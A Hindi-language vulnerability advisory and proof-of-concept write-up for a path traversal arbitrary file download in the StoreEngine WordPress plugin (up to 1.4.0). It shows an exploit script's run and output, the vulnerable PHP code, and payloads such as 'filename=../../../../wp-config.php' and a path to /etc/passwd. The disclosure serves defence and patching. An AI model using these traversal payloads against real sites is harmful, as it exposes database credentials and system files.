
StoreEngine – भुगतान, सदस्यता, सहबद्ध, बिक्री और अधिक के लिए शक्तिशाली WordPress ई-कॉमर्स प्लगइन <= 1.4.0 - प्रमाणित (सब्सक्राइबर+) मनमाना फ़ाइल डाउनलोड
StoreEngine प्लगइन में उसके CSV Import/Export सुविधा में एक भेद्यता है जो किसी भी प्रमाणित उपयोगकर्ता (सब्सक्राइबर, लेखक, संपादक, आदि) को सर्वर से मनमानी फ़ाइलें डाउनलोड करने की अनुमति देती है, जिसमें संवेदनशील सिस्टम फ़ाइलें, WordPress कॉन्फ़िगरेशन फ़ाइलें, और प्लगइन सोर्स कोड शामिल हैं। यह भेद्यता storeengine_csv/file_download एंडपॉइंट में उचित पथ स्वच्छता (path sanitization) की कमी और केवल nonce सत्यापन पर निर्भरता के कारण उत्पन्न होती है, जबकि storeengine_nonce प्लगइन के JavaScript के माध्यम से सभी फ्रंटएंड उपयोगकर्ताओं को उजागर होता है। नोट: इस भेद्यता का शोषण करने के लिए CSV Import/Export ऐडऑन को किसी व्यवस्थापक द्वारा सक्षम किया जाना आवश्यक है। सक्षम होने पर, यह संयोजन किसी भी प्रमाणित उपयोगकर्ता को फ्रंटएंड पेजों से nonce निकालने और उसे पथ ट्रैवर्सल हमलों के माध्यम से सर्वर पर किसी भी फ़ाइल को डाउनलोड करने के लिए उपयोग करने की अनुमति देता है, जिससे सब्सक्राइबर+ उपयोगकर्ताओं को संवेदनशील सिस्टम और एप्लिकेशन फ़ाइलों तक पहुंच प्रभावी रूप से मिल जाती है।
python3 ./CVE-2025-9215.py http://localhost:1337 user1 password
Logging into: http://localhost:1337/wp-admin
NOTE: This exploit works with any authenticated user (subscriber, author, editor, etc.)
Extracting nonce from frontend scripts (accessible to any user)...
storeengine_nonce: 82cb37f678
NOTE: This nonce is exposed to ALL frontend users, making the vulnerability exploitable by any authenticated user!
NOTE: CSV Import/Export addon must be enabled by an administrator before exploitation.
This exploit demonstrates the vulnerability once the addon is already enabled.
The addon activation requires 'manage_options' capability (admin only).
Downloading wp-config.php via path traversal...
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
...
...
...
नोट: इस भेद्यता का शोषण करने के लिए CSV Import/Export ऐडऑन को किसी व्यवस्थापक द्वारा सक्षम किया जाना आवश्यक है। ऐडऑन सक्रियण एंडपॉइंट (storeengine/saved_addon_status) को manage_options क्षमता की आवश्यकता होती है, जिसका अर्थ है कि केवल व्यवस्थापक ही इस कार्यक्षमता को सक्षम कर सकते हैं।
storeengine_csv/file_download AJAX क्रिया /wp-content/plugins/storeengine/addons/csv/ajax/export.php की पंक्ति 47 पर file_download() फ़ंक्शन को कॉल करती है, जिसमें उचित पथ स्वच्छता (path sanitization) का अभाव है और यह मनमानी फ़ाइल डाउनलोड की अनुमति देती है:
public function file_download( array $payload ) {
if ( ! isset( $payload['filename'] ) ) {
wp_send_json_error( __( 'Filename is required.', 'storeengine' ) );
}
$filename = $payload['filename'];
$filepath = Helper::get_upload_dir() . '/csv/' . $filename; // <-- VULNERABLE TO PATH TRAVERSAL!
// NO CAPABILITY CHECK - ANY USER CAN DOWNLOAD ANY FILE!
// NO PATH SANITIZATION - DIRECT CONCATENATION ALLOWS ../ ATTACKS!
if ( ! file_exists( $filepath ) ) {
wp_send_json_error( __( 'File not found.', 'storeengine' ) );
}
header( 'Content-Type: application/octet-stream' );
header( 'Content-Disposition: attachment; filename="' . $filename . '"' );
readfile( $filepath ); // <-- READS AND OUTPUTS ANY FILE!
exit;
}
भेद्य पथ निर्माण पूर्ण पथ ट्रैवर्सल की अनुमति देता है:
// Helper::get_upload_dir() returns:
$upload = wp_upload_dir();
return $upload['basedir'] . '/storeengine_uploads';
// So the full path becomes:
$filepath = '/path/to/wp-content/uploads/storeengine_uploads/csv/' . $filename;
// With path traversal, this becomes:
$filepath = '/path/to/wp-content/uploads/storeengine_uploads/csv/../../../wp-config.php'
$filepath = '/path/to/wp-content/uploads/storeengine_uploads/csv/../../../../../../etc/passwd'
storeengine_nonce प्लगइन के JavaScript के माध्यम से सभी फ्रंटएंड उपयोगकर्ताओं को उजागर होता है। यह /wp-content/plugins/storeengine/includes/assets.php की पंक्ति 279 पर स्थित _get_script_data() विधि में होता है:
public function _get_script_data(): array {
// ... other data ...
return [
'nonce' => wp_create_nonce( 'wp_rest' ),
'storeengine_nonce' => wp_create_nonce( 'storeengine_nonce' ), // Line 279 - EXPOSED TO ALL USERS
'rest_url' => esc_url_raw( rest_url() ),
// ... other data ...
];
}
यह nonce फिर पंक्ति 120 पर स्थित frontend_scripts() विधि के माध्यम से फ्रंटएंड JavaScript में localize किया जाता है:
wp_localize_script(
'storeengine-frontend-scripts',
'StoreEngineGlobal',
$this->get_frontend_script_data() // Calls _get_script_data()
);
nonce को /wp-content/plugins/storeengine/includes/classes/abstract-request-handler.php की पंक्ति 510 पर स्थित AbstractRequestHandler::check_permission() विधि में सत्यापित किया जाता है:
protected function check_permission( string $capability, bool $allow_visitors = false ) {
if ( ( ! is_user_logged_in() && ! $allow_visitors ) || ( is_user_logged_in() && $capability && ! current_user_can( $capability ) ) ) {
return new WP_Error(/* ... */);
}
return true;
}
यह संयोजन किसी भी प्रमाणित उपयोगकर्ता को CSRF सुरक्षा को बायपास करने और सर्वर पर किसी भी फ़ाइल को डाउनलोड करने की अनुमति देता है, जिसमें संवेदनशील कॉन्फ़िगरेशन फ़ाइलें, सोर्स कोड, और संभावित रूप से सिस्टम फ़ाइलें शामिल हैं।
/wp-admin/admin-ajax.php पर एक अनुरोध को इंटरसेप्ट करें जो storeengine_csv/file_download क्रिया को कॉल करता है।filename=../../../../wp-config.php के साथ अनुरोध भेजें।